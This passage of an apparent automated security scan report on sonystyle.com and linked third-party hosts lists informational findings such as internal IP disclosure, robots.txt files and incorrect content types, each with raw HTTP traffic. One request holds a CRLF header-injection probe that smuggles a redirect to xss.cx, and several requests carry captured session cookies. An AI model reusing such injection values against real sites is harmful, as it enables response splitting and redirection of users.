<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...

14.4. http://www.sonystyle.com/wcsstore/SonyStyleStorefrontAssetStore/js/ss_home_eventListeners.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sonystyle.com
Path:   /wcsstore/SonyStyleStorefrontAssetStore/js/ss_home_eventListeners.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /wcsstore/SonyStyleStorefrontAssetStore/js/ss_home_eventListeners.js HTTP/1.1
Host: www.sonystyle.com
Proxy-Connection: keep-alive
Referer: http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TS5bbf46=16e18bd3aad35848291e7bce5bac11005e46b2c7608495f34e035480; mbox=check#true#1308841151|session#1308841090453-474854#1308842951; ensRefId=http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551; ensUID=17410958ILJeqRHT23LY; sifrFetch=true; fsr.a=1308841092970

Response

HTTP/1.1 200 OK
Last-Modified: Tue, 03 May 2011 21:22:34 GMT
Accept-Ranges: bytes
ntCoent-Length: 20033
Content-Type: application/x-javascript
Content-Length: 20033
Vary: Accept-Encoding
Date: Thu, 23 Jun 2011 14:58:12 GMT
Connection: close
Cache-Control: private

/*    SONY | SONY STYLE
*    Homepage JS Functions and Event Listeners
*
*    Author: Steve Rucker, Interactive Developer | B2C CST SAPE Augmentation team | srucker@sapient .com
* Alex Jain, Sr As
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...

15. Robots.txt file  previous  next
There are 3 instances of this issue:

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.


15.1. http://www.google-analytics.com/__utm.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google-analytics.com
Path:   /__utm.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.google-analytics.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 10 Jan 2011 11:53:04 GMT
Date: Thu, 23 Jun 2011 15:00:01 GMT
Expires: Thu, 23 Jun 2011 15:00:01 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /siteopt.js
Disallow: /config.js

15.2. http://www.googleadservices.com/pagead/conversion/1047459996/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.googleadservices.com
Path:   /pagead/conversion/1047459996/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.googleadservices.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Fri, 10 Jun 2011 20:18:24 GMT
Date: Thu, 23 Jun 2011 14:59:54 GMT
Expires: Thu, 23 Jun 2011 14:59:54 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

15.3. http://www.omnitechsupport.com/sony/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omnitechsupport.com
Path:   /sony/index.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.omnitechsupport.com

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 14:59:58 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 09 Mar 2011 21:51:01 GMT
ETag: "aa556a-91-b9865b40"
Accept-Ranges: bytes
Content-Length: 145
Connection: close
Content-Type: text/plain; charset=UTF-8

# robots.txt for http://www.omnitechsupport.com

User-agent: *
Disallow: /services/


Sitemap: http://www.omnitechsupport.com/sitemap.xml

16. Cacheable HTTPS response  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.websitealive5.com
Path:   /favicon.ico

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:

Request

GET /favicon.ico HTTP/1.1
Host: www.websitealive5.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDAQSSBBCC=EHNLLBEBNIJJJKCLOEIKFCHO; ASPSESSIONIDAQSSAADD=LGJFONDBOCBFHBFFGEDMAIAF; BIGipServerWebSiteAlive_WWW-1=355578890.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Thu, 23 Jun 2011 15:17:50 GMT
Content-Length: 35


   <h1>404 - File Not Found</h1>
   

17. HTML does not specify charset  previous  next
There are 7 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.


17.1. http://www.docs.sony.com/reflib/docget.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.docs.sony.com
Path:   /reflib/docget.asp

Request

GET /reflib/docget.asp HTTP/1.1
Host: www.docs.sony.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 23 Jun 2011 15:09:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 79
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQSTSQSCR=PFCCABKBJDOBFNKNEPFEAPOM; path=/
Cache-control: private

<center><font color=red><b>ERROR:</b> Invalid Document Provided</font></center>

17.2. http://www.docs.sony.com/startchat.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.docs.sony.com
Path:   /startchat.asp

Request

GET /startchat.asp HTTP/1.1
Host: www.docs.sony.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 23 Jun 2011 15:09:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 6969
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQSTSQSCR=FGCCABKBIDKABCNODCECHCGC; path=/
Cache-control: private


<HTML>
   <HEAD>
       <TITLE>Sony eSupport Live Chat Support</TITLE>
       <SCRIPT language="javascript">
       function openTrademarkLink(){window.open('http://products.sel.sony.com/SEL/legal/notice.html','
...[SNIP]...

17.3. http://www.sonystyle.com/4a76d%0d%0aLocation:%20http://xss.cx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sonystyle.com
Path:   /4a76d%0d%0aLocation:%20http://xss.cx

Request

GET /4a76d%0d%0aLocation:%20http://xss.cx HTTP/1.1
Host: www.sonystyle.com
Cookie: sifrFetch=true; s_vi=[CS]v1|2701AA430515874D-60000181000007CB[CE]; JSESSIONID=0000GBxzJ8ocWqxo7Twu8MoxGDb:14aelt0ld; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=yvTBhIsIzJXeq0V1jN5EG7plRAA%3d%0a%3b2011%2d06%2d23+10%3a58%3a28%2e003%5f1308841107995%2d82466%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2clUuR4QTxf%2f5YInkNp5DLwEIROKszrQDAawe%2bFWWFEzIDxeUPIdTDYWkA5rkgPjRP7uidpXvVAq2h%0aJC2GZox%2bEO9n57RB95%2fBJ6N%2fOyuJlvGbaiD7FrSmImcI6%2bWFUECX5dn2JvAzvA5MAH9zFwLDmQ%3d%3d; WC_GENERIC_ACTIVITYDATA=[1131585542%3atrue%3afalse%3a0%3aOJQ8PE3BCkIUlGMHsRAnJG9WJb4%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|null%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10504%2610504%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; mbox=session#1308841090453-474854#1308844298|PC#1308841090453-474854.17#1310052038|check#true#1308842498; ensRefId=http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551; ensUID=17410958ILJeqRHT23LY; s_cc=true; s_visit=1; c_m=undefinedburpburp; s_channel=%5B%5B%27Other%27%2C%271308842437917%27%5D%5D; s_sq=%5B%5BB%5D%5D; TS5bbf46=cefc48127b1086f50e229f977108f9dea8a8150f8ba2300a4e0359c7; fsr.s={"v":1,"rid":"1308841108174_99949","cp":{"cybershot":"N","innovation":"N","experts":"N"},"pv":3,"c":"http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay","lc":{"d0":{"v":3,"s":false}},"cd":0,"sd":0}; 71737897-VID=16101514677756; 71737897-SKEY=4916265021794629949; HumanClickSiteContainerID_71737897=STANDALONE

Response

HTTP/1.0 408 Request Time-out
Server: AkamaiGHost
Mime-Version: 1.0
Date: Thu, 23 Jun 2011 15:24:19 GMT
Content-Type: text/html
Content-Length: 218
Expires: Thu, 23 Jun 2011 15:24:19 GMT

<HTML><HEAD>
<TITLE>Request Timeout</TITLE>
</HEAD><BODY>
<H1>Request Timeout</H1>
The server timed out while waiting for the browser's request.<P>
Reference&#32;&#35;2&#46;881ff648&#46;1308842659&#46
...[SNIP]...

17.4. http://www.sonystyle.com/webapp/wcs/stores/servlet/CategoryDisplay  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sonystyle.com
Path:   /webapp/wcs/stores/servlet/CategoryDisplay

Request

GET /webapp/wcs/stores/servlet/CategoryDisplay?catalogId
=10551&storeId=10151&langId=-1&identifier=S_Sony_Howdini HTTP/1.1
Host: www.sonystyle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 400 Bad Request
Server: AkamaiGHost
Mime-Version: 1.0
Content-Type: text/html
Content-Length: 216
Expires: Thu, 23 Jun 2011 15:20:00 GMT
Date: Thu, 23 Jun 2011 15:20:00 GMT
Connection: close

<HTML><HEAD>
<TITLE>Bad Request</TITLE>
</HEAD><BODY>
<H1>Bad Request</H1>
Your browser sent a request that this server could not understand.<P>
Reference&#32;&#35;7&#46;881ff648&#46;1308842400&#46;0

...[SNIP]...

17.5. http://www.sonystyle.com/webapp/wcs/stores/servlet/ContentDisplayView  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sonystyle.com
Path:   /webapp/wcs/stores/servlet/ContentDisplayView

Request

GET /webapp/wcs/stores/servlet/ContentDisplayView?hideHeaderFooter
=false&storeId=10151&catalogId=10551&langId=-1&cmsId=STATICS_BIV_showcase HTTP/1.1
Host: www.sonystyle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 400 Bad Request
Server: AkamaiGHost
Mime-Version: 1.0
Content-Type: text/html
Content-Length: 216
Expires: Thu, 23 Jun 2011 15:20:02 GMT
Date: Thu, 23 Jun 2011 15:20:02 GMT
Connection: close

<HTML><HEAD>
<TITLE>Bad Request</TITLE>
</HEAD><BODY>
<H1>Bad Request</H1>
Your browser sent a request that this server could not understand.<P>
Reference&#32;&#35;7&#46;881ff648&#46;1308842402&#46;0

...[SNIP]...

17.6. https://www.websitealive5.com/4405/operator/guest/gLogin_Server.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.websitealive5.com
Path:   /4405/operator/guest/gLogin_Server.asp

Request

GET /4405/operator/guest/gLogin_Server.asp?groupid=4405&action=writeinfocapture&ismobile=False&vbrowser=other&skin_id=4621&infocapture_ids=&infocapture_values=&departmentid=5101 HTTP/1.1
Host: www.websitealive5.com
Connection: keep-alive
Referer: https://www.websitealive5.com/4405/operator/guest/gDefault_v2.asp?cframe=login&chattype=normal&groupid=4405&websiteid=150&departmentid=5101&sessionid_=370043&iniframe=&ppc_id=&autostart=&text2chat_info=&loginname=&loginnamelast=&loginemail=&loginphone=&infocapture_ids=&infocapture_values=&dl=http%3A%2F%2Fwww%2Eomnitechsupport%2Ecom%2Fabout%2Ephp&loginquestion=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDAQSSBBCC=EHNLLBEBNIJJJKCLOEIKFCHO; ASPSESSIONIDAQSSAADD=LGJFONDBOCBFHBFFGEDMAIAF; BIGipServerWebSiteAlive_WWW-1=355578890.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: no-store, must-revalidate, private,private
Pragma: no-cache
Content-Type: text/html
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NOI DSP COR CURa OUR NOR"
X-Powered-By: ASP.NET
Date: Thu, 23 Jun 2011 15:16:32 GMT
Content-Length: 988

//alert('writeinfocapture');
   document.getElementById("infocapturecontent").innerHTML = '<div class="general_text" style="margin-top:5px;">Phone Number</div><input type="hidden" name="i1" value="125"
...[SNIP]...

17.7. https://www.websitealive5.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.websitealive5.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.websitealive5.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDAQSSBBCC=EHNLLBEBNIJJJKCLOEIKFCHO; ASPSESSIONIDAQSSAADD=LGJFONDBOCBFHBFFGEDMAIAF; BIGipServerWebSiteAlive_WWW-1=355578890.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Thu, 23 Jun 2011 15:17:50 GMT
Content-Length: 35


   <h1>404 - File Not Found</h1>
   

18. Content type incorrectly stated  previous  next
There are 5 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


18.1. http://sr2.liveperson.net/hcp/html/mTag.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://sr2.liveperson.net
Path:   /hcp/html/mTag.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /hcp/html/mTag.js?site=71737897 HTTP/1.1
Host: sr2.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16101514677756,d=1305377522

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Content-Location: http://sales.liveperson.net/lpWeb/default_ENT//hcpv/emt/mtag.js?site=71737897
Last-Modified: Sun, 13 Mar 2011 22:27:52 GMT
Accept-Ranges: bytes
ETag: "e0f243e4cde1cb1:1dbf"
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 17291
Date: Thu, 23 Jun 2011 14:58:27 GMT
Connection: close

eval((function(s){var a,c,e,i,j,o="",r,t=".....................................................................................................................$@^`~";for(i=0;i<s.length;i++){r=t+s[i][
...[SNIP]...

18.2. http://www.apache.org/licenses/LICENSE-2.0  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.apache.org
Path:   /licenses/LICENSE-2.0

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /licenses/LICENSE-2.0 HTTP/1.1
Host: www.apache.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:19:39 GMT
Server: Apache/2.3.8 (Unix) mod_ssl/2.3.8 OpenSSL/1.0.0c
Content-Location: LICENSE-2.0.txt
Vary: negotiate,accept
TCN: choice
Last-Modified: Mon, 01 Nov 2010 19:49:36 GMT
ETag: "d23b5d-2c5e-494031b9e1400;49ce17c126e80"
Accept-Ranges: bytes
Content-Length: 11358
Cache-Control: max-age=3600
Expires: Thu, 23 Jun 2011 16:19:39 GMT
Connection: close
Content-Type: text/plain; charset=utf-8


Apache License
Version 2.0, January 2004
http://www.apache.org/licenses/

TERMS AND CONDITIONS FOR USE, REPRODUC
...[SNIP]...

18.3. http://www.docs.sony.com/reflib/docget.asp  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.docs.sony.com
Path:   /reflib/docget.asp

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /reflib/docget.asp HTTP/1.1
Host: www.docs.sony.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 23 Jun 2011 15:09:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 79
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQSTSQSCR=PFCCABKBJDOBFNKNEPFEAPOM; path=/
Cache-control: private

<center><font color=red><b>ERROR:</b> Invalid Document Provided</font></center>

18.4. https://www.websitealive5.com/4405/operator/guest/gLogin_Server.asp  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.websitealive5.com
Path:   /4405/operator/guest/gLogin_Server.asp

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /4405/operator/guest/gLogin_Server.asp?groupid=4405&action=writeinfocapture&ismobile=False&vbrowser=other&skin_id=4621&infocapture_ids=&infocapture_values=&departmentid=5101 HTTP/1.1
Host: www.websitealive5.com
Connection: keep-alive
Referer: https://www.websitealive5.com/4405/operator/guest/gDefault_v2.asp?cframe=login&chattype=normal&groupid=4405&websiteid=150&departmentid=5101&sessionid_=370043&iniframe=&ppc_id=&autostart=&text2chat_info=&loginname=&loginnamelast=&loginemail=&loginphone=&infocapture_ids=&infocapture_values=&dl=http%3A%2F%2Fwww%2Eomnitechsupport%2Ecom%2Fabout%2Ephp&loginquestion=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDAQSSBBCC=EHNLLBEBNIJJJKCLOEIKFCHO; ASPSESSIONIDAQSSAADD=LGJFONDBOCBFHBFFGEDMAIAF; BIGipServerWebSiteAlive_WWW-1=355578890.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: no-store, must-revalidate, private,private
Pragma: no-cache
Content-Type: text/html
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NOI DSP COR CURa OUR NOR"
X-Powered-By: ASP.NET
Date: Thu, 23 Jun 2011 15:16:32 GMT
Content-Length: 988

//alert('writeinfocapture');
   document.getElementById("infocapturecontent").innerHTML = '<div class="general_text" style="margin-top:5px;">Phone Number</div><input type="hidden" name="i1" value="125"
...[SNIP]...

18.5. https://www.websitealive5.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.websitealive5.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /favicon.ico HTTP/1.1
Host: www.websitealive5.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDAQSSBBCC=EHNLLBEBNIJJJKCLOEIKFCHO; ASPSESSIONIDAQSSAADD=LGJFONDBOCBFHBFFGEDMAIAF; BIGipServerWebSiteAlive_WWW-1=355578890.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Thu, 23 Jun 2011 15:17:50 GMT
Content-Length: 35


   <h1>404 - File Not Found</h1>
   

19. Content type is not specified  previous
There are 2 instances of this issue:

Issue description

If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


19.1. http://www.sonystyle.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sonystyle.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.sonystyle.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
